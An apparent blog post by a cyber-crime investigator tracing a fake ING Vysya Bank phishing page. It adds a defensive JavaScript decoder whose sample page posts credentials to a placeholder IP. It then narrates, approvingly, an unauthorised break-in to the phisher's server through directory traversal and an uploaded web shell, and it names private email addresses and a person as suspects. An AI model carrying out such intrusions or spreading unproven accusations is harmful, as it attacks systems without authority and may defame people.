August 9, 2017

Phishing in a well

I received an official mail asking me to confirm whether a mail they had received was legitimate or something suspicious.
The e-mail had a reply-to address of update@ingvysyabank.co.in.

The domain ingvysyabank.co.in is a genuine domain registered by ING Vysya Bank but is not active.



Now, I had to check whether the e-mail ID really existed.




Without further ado, I started looking into the mail; it also had an attachment.

I downloaded the attachment (an HTML file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicked 'Submit', so I entered random details and clicked the 'Submit' button. I could see in the status bar of my browser that the data was going to some IP 207.210.xx.xxx, after which the page redirected to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check that the page worked as it was meant to.


The next step was to view the source code of the HTML page to find exactly where the data went on the click of the 'Submit' button.

The source code was obfuscated: the page content was stored percent-encoded using JavaScript's encodeURI() function and decoded at run time. Because of the obfuscation the source was Greek to me, so I had to somehow decode the content to view it in clear text. That is where the decodeURI() function came in, which was the need of the hour. The data turned out to be double-encoded, so I had to decode it twice, using unescape() or decodeURI(), before I finally got the clear text after some time.

Now I knew exactly what to look for in the source code: the "<form action>" attribute, which together with the request method "POST" submits the data to some host.

It was "http://207.210.xx.xxx/~camion/remax/yes/is_vector.php".
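As an added illustration (example code written for this page, not the original post's or the phishing kit's own code), here is the decoding step done in JavaScript instead of by hand. The sample page, its IP address, path and field names are constructed placeholders, not the real kit's values. The decoder pulls the string literal out of the document.write(unescape(...)) wrapper, keeps decoding until no percent-escapes are left (so it handles double encoding and deeper), and then lists every <form action> and method it finds in the clear text.

```javascript
// Added example (not from the original post): peel the percent-encoding off a
// phishing page that hides its HTML behind document.write(unescape(...)), then
// pull out every <form action=...> so we can see where credentials are POSTed.
// The sample page below is constructed for the demo; the IP, path and field
// names are placeholders, not the ones from the real kit.

const INNER_HTML =
  '<html><body><form action="http://203.0.113.10/~demo/login/post.php" method="POST">' +
  '<input name="userid"><input type="password" name="pin">' +
  '<input type="submit" value="Submit"></form></body></html>';

// Double-encode, like the kit the post describes, and wrap it in the usual loader.
const SAMPLE_PAGE =
  '<script>document.write(unescape("' +
  encodeURIComponent(encodeURIComponent(INNER_HTML)) +
  '"))</script>';

// Pull the string literals passed to unescape()/decodeURI()/decodeURIComponent().
function extractEncodedPayloads(html) {
  const re = /(?:unescape|decodeURI(?:Component)?)\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(html)) !== null) payloads.push(m[2]);
  return payloads;
}

// Decode one layer: decodeURIComponent handles %XX; unescape additionally
// handles the old %uXXXX form that escape() produces and decodeURIComponent rejects.
function decodeOnce(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return unescape(s);
  }
}

// Keep decoding until no %XX / %uXXXX escapes remain or the text stops
// changing. Returns the clear text and the number of layers removed.
function decodeFully(s, maxRounds = 8) {
  let rounds = 0;
  let cur = s;
  while (rounds < maxRounds && /%(?:[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4})/.test(cur)) {
    const next = decodeOnce(cur);
    if (next === cur) break; // nothing decodable left, stop
    cur = next;
    rounds += 1;
  }
  return { text: cur, rounds };
}

// Find every <form> and report its action and method (method defaults to GET).
function findFormTargets(html) {
  const formRe = /<form\b([^>]*)>/gi;
  const attr = (attrs, name) => {
    const m = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i').exec(attrs);
    return m ? (m[1] ?? m[2] ?? m[3]) : null;
  };
  const targets = [];
  let m;
  while ((m = formRe.exec(html)) !== null) {
    targets.push({
      action: attr(m[1], 'action'),
      method: (attr(m[1], 'method') || 'GET').toUpperCase(),
    });
  }
  return targets;
}

// End-to-end: de-obfuscate the page and list where each form submits.
function analysePage(html) {
  const decoded = extractEncodedPayloads(html).map((p) => decodeFully(p));
  const clearText = decoded.map((d) => d.text).join('\n');
  return {
    layers: decoded.map((d) => d.rounds),
    clearText,
    targets: findFormTargets(clearText),
  };
}

const result = analysePage(SAMPLE_PAGE);
console.log('layers removed:', result.layers, 'targets:', JSON.stringify(result.targets));
```

Run it with node. Decoding in a loop rather than exactly twice covers kits that stack more layers or mix escape() with encodeURIComponent(), and the %uXXXX fallback covers the older escape() output. Doing this offline in a script rather than by submitting random data into the live page has the added benefit of not sending the attacker a request from your own IP.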

Great! Now we knew where our data was going.
By the way, you already know that we cannot view the actual source code of a PHP file from the client side, right?
The server executes it before sending the response, so we only get to see the output it produced, not the code that produced that output.

So now our aim was to see the code of this file "is_vector.php". I did some directory traversal to browse through the various directories, found a file-upload vulnerability in one of the pages there, and that's where I fired my favourite madspot shell; with that we had access to all the files in that directory and all its sub-directories.

It took some time to find out which directory held the juicy information relevant to this case.
But first I was interested in identifying the last IP that had accessed the site from the access logs, and it was 41.206.15.41.
A quick WHOIS lookup showed that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP, but anyway that is not what we wanted to find out, at least in this case.)
   

Moving on to the actual source code of the PHP file "is_vector.php", I traversed the path to reach the file, viewed its source, and found that the data was being mailed to three IDs: cyber_crime52@yahoo.com, mrlogin801@gmail.com, and johncooperesq@live.com.




To know the potential victims of this attack, I would have had to hack (get) into the above accounts and check their inboxes for the details they had received.

Luckily, one of them had been careless: he had also added code at the end of that PHP file that appended the submitted data to a text file in a directory there, in addition to sending it via their mailer to the above mail IDs.

The mailer was found to be configured by one Heru Kusnadi (heru.kusna@gmail.com), who might be the main person behind this or could just be another partner in crime.




Anyway, after deep-walking through those dozens of directories, I finally got the dump of credentials already submitted by some potential victims.


As I was not directly concerned with the victims outside India, I was looking for data related to Indians. I could find a dozen valid responses (proper credentials), and, fortunately or unfortunately, they had also filled in their genuine mobile numbers. That made it easier for the team to contact them and advise them to change their credentials (ATM PIN, transaction password, email password, etc.).



By the grace of the Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help, and some of them also burst into tears, but out of happiness, as some victims had recently transferred their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of contentment both individually and towards the Department, which they now trust.
Well, that is more than enough! :)
There was no official complaint as such, but sometimes we take action like in 'Minority Report' ;)

Anyway, if you find anything suspicious (mails, lottery SMSes, etc.), kindly report it to your local Cyber Cell, at least via mail, or dial 1930 and/or report it at cybercrime.gov.in.

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, KANK, F-roZ, i-maD

Regards,
itsmeRiF
The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.